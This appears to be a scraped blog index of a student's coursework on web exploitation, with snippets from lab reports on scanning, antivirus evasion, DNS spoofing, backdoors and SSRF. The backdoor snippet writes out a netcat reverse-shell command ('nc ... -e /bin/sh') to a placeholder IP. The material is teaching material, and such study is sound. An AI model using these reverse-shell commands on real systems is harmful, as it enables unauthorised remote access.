20155236范晨歌免考项目:web安全之漏洞利用

  1. PHP和PHPinfo的简单介绍

    https://www.cnblogs.com/fcgfcgfcg/p/9234978.html

  2. 通过CSRF漏洞加深理解

    https://www.cnblogs.com/fcgfcgfcg/p/9244626.html

  3. phpMyAdmin 4.7.x CSRF 漏洞利用及phpMyAdmin介绍

    https://www.cnblogs.com/fcgfcgfcg/p/9221217.html

  4. phpMyAdmin 4.8.x 本地文件包含漏洞利用

    https://www.cnblogs.com/fcgfcgfcg/p/9235040.html

  5. 虚拟机检测程序

    https://www.cnblogs.com/fcgfcgfcg/p/9272944.html

  6. XAMPP及PHPstorm和PHPcharm环境搭建以及暴力破解

    https://www.cnblogs.com/fcgfcgfcg/p/9272927.html

原文地址:https://www.cnblogs.com/fcgfcgfcg/p/9272915.html

时间: 2024-11-06 07:15:05

20155236范晨歌免考项目:web安全之漏洞利用的相关文章

20155236范晨歌_exp6信息搜集与漏洞扫描

20155236范晨歌_exp6信息搜集与漏洞扫描 目录 实践目标 信息搜集 漏洞扫描 总结 实践目标 (1)各种搜索技巧的应用 (2)DNS IP注册信息的查询 (3)基本的扫描技术:主机发现.端口扫描.OS及服务版本探测.具体服务的查点 (4)漏洞扫描:会扫,会看报告,会查漏洞说明,会修补漏洞 信息搜集 实验内容 查询一个网站的注册信息,可以看到其拥有的ip段.注册地址.注册人.联系方式.所属国家城市和地理信息:追踪路由探测数据包的传递过程,并利用ip定位查看路由地理信息:利用搜索引擎精确获

20155236范晨歌_EXP3免杀原理与实践

20155236范晨歌_免杀原理与实践 免杀 概述 免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),逐字翻译为"反-反病毒",翻译为"反杀毒技术". 被谁杀?当然是被杀毒软件(引擎)杀.所以,要做好免杀技术(防御),就要弄清杀毒方式(攻击),也就是这些杀毒软件是如何工作的. 恶意代码检测方式 基于特征码的检测 特征库,也就是我们平时说的病毒库,它记录了一些恶意软件的特征码

20155236范晨歌 Exp7 网络欺诈技术防范

20155236范晨歌 Exp7 网络欺诈技术防范 虚拟机经常崩= =,所以基本上做一个实验换一个... 遇到了一个简单的小问题老师帮忙解决了:虚拟机没联网... 一.基础问题回答 通常在什么场景下容易受到DNS spoof攻击? 乱连没有密码的wifi,因为这样就会和连入局域网和该局域网中的各个主机都处于同一网段下了. 在日常生活工作中如何防范以上两攻击方法? URL攻击的防范主要就是打开网页的时候注意看其ip地址,事先可以通过gid命令和nslookup命令查看网站正确的ip地址,如果网站显

20155236范晨歌 Exp2后门原理与实践

## 实验二 后门原理与实践 1.Windows获得Linux Shell 在windows下,打开CMD,使用ipconfig指令查看本机IP ncat.exe -l -p 5236监听本机的5236端口 在kali端,使用nc指令的-e选项,nc XXX.XXX.XXX.XXX(主机ip) 5236(所设置的端口) -e /bin/sh反向连接Windows主机的5236端口: 在windows端,就可以使用kali的命令行 2.Linux获得Windows Shell 1)在Kali环境下

Web安全-SSRF漏洞利用从浅到深

梳理一下ssrf 不详细 简单记录 看不懂拉倒 0x01 SSRF成因和基本利用0x02 内网打未授权redis0x03 关于ssrf打授权的redis0x04 写redis shell和密钥的一点问题0x05 SSRF Bypass0x06 SSRFmap last 0x01 SSRF成因和基本利用 php vul function: file_get_contents() fsockopen() curl_exec() readfile() example: <?php function c

项目 Web 的 NuGet 程序包还原失败: 找不到“1.0.0”版本的程序包“Microsoft.Net.Compilers”。。 0

项目   Web 的 NuGet 程序包还原失败: 找不到“1.0.0”版本的程序包“Microsoft.Net.Compilers”.. 0 使用vs的NutGet包管理器时,另一台电脑从svn下载代码后出现的错误,修改包管理器的源为 http://www.nuget.org/api/v2/ .重试后成功

php小项目-web在线文件管理器

php小项目-web在线文件管理器 一 项目结果相关视图 二 项目经验 通过简单的实现小项目,对php的文件相关操作更加熟悉,主要用于熟悉文件的相关操作 三 源代码下载地址 http://files.cnblogs.com/files/qiujun/fileManager.zip

SharePoint 根据列表项目的元属性按照条件筛选列表项目 Web 部件

SharePoint 根据列表项目的元属性按照条件筛选列表项目 Web 部件 效果截图: 将Web部件添加到列表页面上 删选Country栏目为Germany 筛选城市为Berlin 编辑Web部件,可以选择供筛选的栏目 Web部件下载地址:点击此处下载. 后来知道原来是国人写的. 参考下面的博文: http://www.cnblogs.com/jianyi0115/archive/2011/12/09/2282287.html http://www.cnblogs.com/jianyi0115

20155326《网络对抗》免考项目—— 深入恶意代码之恶意代码详解

20155326<网络对抗>免考项目--深入恶意代码之恶意代码详解 什么是恶意代码 恶意代码是一种程序,它通过把代码在不被察觉的情况下镶嵌到另一段程序中,从而达到破坏被感染电脑数据.运行具有入侵性或破坏性的程序.破坏被感染电脑数据的安全性和完整性的目的. 恶意代码生命周期 攻击目标: 个人计算机 服务器 移动智能终端 手机.平板等 智能设备 特斯拉汽车.智能家居.智能手表等 通信设备 路由器.交换机等 安全设备等 防火墙.IDS, IPS. VDS 攻击目标范围: 定点攻击 邮件.IP.域名.